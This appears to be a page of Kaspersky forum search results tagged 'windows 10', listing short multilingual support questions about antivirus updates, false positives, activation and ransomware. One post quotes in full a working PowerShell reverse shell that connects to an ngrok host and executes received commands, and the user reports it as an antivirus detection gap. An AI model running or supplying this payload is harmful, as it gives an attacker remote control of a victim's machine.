Jump to content

Search the Community

Showing results for tags 'windows 10'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • English Forum
    • Products for Home
    • Products for Business
    • Kaspersky Anti-Ransomware Tool
    • Beta Testing Products for Home & Business
  • Русскоязычный форум
    • Продукты для дома
    • Продукты для бизнеса
    • KasperskyOS, Разработка
    • Kaspersky Anti-Ransomware Tool
    • Бета-тестирование продуктов для дома и бизнеса
  • Deutschsprachiges Benutzer-Forum
    • Für Privatanwender
    • Für Unternehmen
  • Forum para usuarios hispanohablantes
    • Para usuarios particulares
    • Para empresas
  • Forum des Utilisateurs Français
    • Pour particuliers
    • Pour les entreprises
  • Forum in Italiano
    • Utenti privati
    • Aziende
  • Fórum Brasileiro
    • Para casa
    • Para PMES e empresas
  • 中文论坛
    • 家用产品支持
    • 企业产品支持
  • Nederlands Gebruikersforum
    • Voor thuis
    • Voor bedrijven
  • Türkçe Forum
    • Ev için
    • İş için
  • Forum Knowledgebase
    • Instructions
    • Advice and solutions

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


  1. I wanna KIS add this feature like macOS's. (On macOS 10.15+, software such as Teamviewer that wants to use these features is licensed by the system.)
  2. Moin, seitdem ich Kaspersky Premium habe, laden viele Videos einfach nicht mehr, welche vorher geladen haben.. Habe AdBlocker alles deaktiviert und dennoch kein Erfolg. Hatte das jemand auch schon mal & wie wurde es gelöst bzw. hat jemand Ideen?
  3. How I can unistall the program? I don't wanted more. I supposed unistalled whit iobit unistaller but when I turn on my PC the program continues in my Pc and running.
  4. What is wrong with this antivirus program? I've been using it for a couple of years, no issue. For the past few months, it's been updating multiple times a day requiring program restart. When I click yes to restart the program, it restarts then silently disables itself. I look in my system tray and there's a red Kaspersky icon. I click on it and it says the program is disabled and I have to manually enable it. WTF? Why should I have to manually enable an antivirus program that I did not disable myself? And 5 minutes after I re-enable it, I get another pop up telling me about a new update requiring restart. AGAIN? WTF? Never had to deal with this crap before. Any idea what is going on or how to fix it? Thank you.
  5. My valorant app when Split Tunneling is on it can't connect to the server even though I have it set to "Don't use VPN". With Split Tunneling off, all connections work fine, but I want to play valorant while using the VPN in the browser. Plz help.
  6. Olá! No dia de hoje , logo no ao começar ao usar o pc (primeira hora, talvez) fui informado pelo software kaspersky security sobre um ataque de rede bloqueado. No minuto seguinte (literalmente), fui informado de outro ataque. Logo passei uma verificação rápida (que nada detectou) e continuei meu trabalho nele normalmente, sem outros avisos. Pois bem, ao fim da tarde, ao retomar uma atividade no pc, após deixa-lo em desuso (ligado), ocorreu outro ataque, seguido de outro no minuto seguinte. Mais uma vez passei outra verificação e nada. Estou agora usando ele sem nada ocorrer, mas fico com preocupação. Já ocorreram outras dessas tempos antes, porem nada de estranho ou nada de prejudicial a meu pc ou aos meu dados . Só que agora quero tentar esclarecer se trata-se de falsos positivos ou algo realmente sério. Seguem imagens da segunda ocorrência. Obrigado.
  7. Добрый день! Беда! Есть две машины с одинаковыми ТТХ. Мат.плата H510M-HVS R2.0 с Intel i7-11700F win10 pro 22h2. После установки любой версии KES 11 произвольный перезапуск в течении 2-3 минут после запуска. Выход из программы продлевает жизнь на минуту, но всё ровно ПК уходит на перезагрузку. Синий экран не показывает. Проблема наблюдается даже на домашних продуктах. P.S. если удалить KES 11, то ПК работает без сбоев.
  8. Добрый день.Подскажите пожалуйста, как установить программу Kaspersky Endpoint Security для бизнеса, даны на 10 ПК, одним комплектом. В школе нет специалиста.Локальной сети нет. Как быть?
  9. Basically, a couple years ago (2020) I had KTS. I deleted it a while ago but I still have this Kaspersky Lab folder in appdata\local which contains a Kaspersky Password Manager inside. When I try to enter/delete, I need to give it permission and when I try to give it permission it says I can't and I need to use the security tab. Is this normal and how can I remove it? I also have an AV folder created around the same time as when I installed KTS inside of program files\common files
  10. 1. Keep getting this warning msg/similar: I put '192.168.0.52:443' in Security settings > Advanced settings > Network settings > Trusted addresses, but I still get the same warning. 2. Help page for this says to tap Show details (see below) - which doesn't exist. If tap Details, you don't get the info below. I understand the risks and wish to continue isn't anywhere.
  11. Kaspersky Anti-virus version: 21.3.10.391 (j), Windows 10 version: Home 19045.2251 How can I disable notifications por Kaspersky Anti-virus in Windows 10? Thanks!
  12. OLÁ, BOA TARDE. FIZ ALTERAÇÃO NO NOME PADRA DO ADMINISTRADOR QUE ERA KLAdmin, ATEREI A SENHA TAMBÉM, AGORA VOU LIBERAR ALGUMA COISA, PEDE A SENHA, EU COLOCO , NÃO CONFERE! COMO RESOLVER ISSO?... NÃO CONSIGO LIBERAR NADA!
  13. Hello, I went to test the antivirus by creating several malicious payloads and it detected them all, but it did not detect a malicious payload of reverse shell in PowerShell. The firewall didn't stop the reverse shell either. Antivirus detected other reverse shell scripts in powershell, but not this one. $client = New-Object System.Net.Sockets.TCPClient('0.tcp.sa.ngrok.io',11248);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Also tested reverse shell on port 1234. GitHub link: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 What should I do to further improve antivirus protection in this case?
  14. 操作系统:Windows10(64位最新版) 卡巴斯基版本:21(个人收费版,已长期使用) 今日更新卡巴斯基病毒库后,卡巴斯基反病毒软件误将 vmware-tray.exe(隶属于VMWorkStation软件)以及 hrupdate.exe(隶属于火绒安全软件)两个文件认为是病毒!!!!!!并一直执行停止进程及删除动作。 严重影响了操作系统运行稳定性。请问到底什么原因会将使用了多年的软件认为是病毒。且这这两个exe 文件数字签名均正常。 此问题请问我该如何处理…… 以下为报告内容: 组件: 系统监控 结果说明: 检测到 类型: 木马 名称: PDM:Trojan.Win32.Generic 威胁级别: 高 对象类型: 进程 对象路径: c:\program files (x86)\huorong\sysdiag\bin 对象名称: hrupdate.exe 原因: 数据库 数据库发布日期: 今天,2022/11/29 21:02:00 组件: 系统监控 结果说明: 已阻止 类型: 木马 名称: PDM:Exploit.Win32.Generic 威胁级别: 高 对象类型: 进程 对象路径: d:\vmwareworkstation 对象名称: vmware.exe 数据库发布日期: 今天,2022/11/29 16:46:00
  15. I have tried to use windows restore, but Total Security never allows it to finish. I have tried exiting Total security, then trying windows restore, but on restart, it again doesnt allow it to work. What is the secret to being able to use windows restore?
  16. I just purchased a new laptop and I tried to install Kaspersky Internet security. But I got an error "You have exceeded the maximum number of activations allowed for the entered activation code".
  17. Здравствуйте! Купил сегодня Kaspersky Internet Security. Скачал установщик. Но он вообще никак не запускается. Ни двойным щелчком, ни от имени администратора. Что делать? ОС Windows 10.
  18. Помогите пожалуйста, не могу понять от каких настроек зависит требование пароля от архива в KES 11.11, все настройки уже посмотрел в KSC, так и не помогло. Уведомления выскакивают каждый день
  19. Hi. I have a full computer encrypted from ransomware. All files are .calix. It seems it is a phobos ransomware, or that i have read about. They look like that: 454147960.pdf.id[BAD714B1-2453].[*****@*****.tld].calix I can attach files if needed. Any chance for decryptor to save my files?
  20. Kaspersky Anti-virus version: 21.3.10.391 (j), Windows 10 version: Home 19045.2251 Text translated into English, so it may be a little different from what appears in the English version of Kasperky Anti-Virus As shown in the picture below, the anti-virus is detecting a file (Oinstall.exe) as malicious. I already put the file as "trusted application" and as "exclusion" but the anti-virus continues to detect and generate the photo message. What can I do to make him stop asking me?
  21. Comment détruire une adresse courriel (donc comment détruire un compte) car j’ai 2 adresses sur le même pc dont 1 a une erreur.
  22. Currently, one of the few apps installed on my windows 11 laptop that runs on the x86 architecture are KTS and KPM. Why don't you make the application available in the correct CPU and OS x64 architecture?? Why stick with the legacy x86 architecture?
  23. I get 3 recommendations from the Kaspersky app and they say Secure traffic in firefox.exe is not monitored. To resume monitoring , add the certificate manually. I already did the steps on the page to add the root certificate to my firefox but it doesn't work. I restart my firefox and it says that firefox.exe is not monitored. it tells me to restart, but every time I do it just says that secure traffic is not monitored and that I need to restart again. Can anyone help me on how to get the secure traffic on firefox?
  24. Добрый день ! Я забыл пароль от Kaspersky Endpoint Security . Пытался сбросить пароль с помощью KLAPR.zip , а дальше он пишет что его нельзя сбросить ! Как мне его сбросить ? Мне нужно было от ребёнка защиту поставить , а теперь сам забыл )). Помогите !!!
  25. Добрый день. В сети стоит сервер "Lansweeper" который ведет мониторинг сети. Но информация с хостов не доходит до сервера потому, что этот трафик режет Kaspersky. Как настроить "Сетевой экран" так чтобы он пропускал запросы "Lansweeper"? Может кто-то сталкивался? PS С поддержкой бодаюсь уже месяц они убеждены что Lansweeper- это программа установленная на хосте. Уверен что проблема в Сетевом экране Касперского потому, что на политиках с выключенным "Сетевым экраном" информация с хостов собирается.
×
×
  • Create New...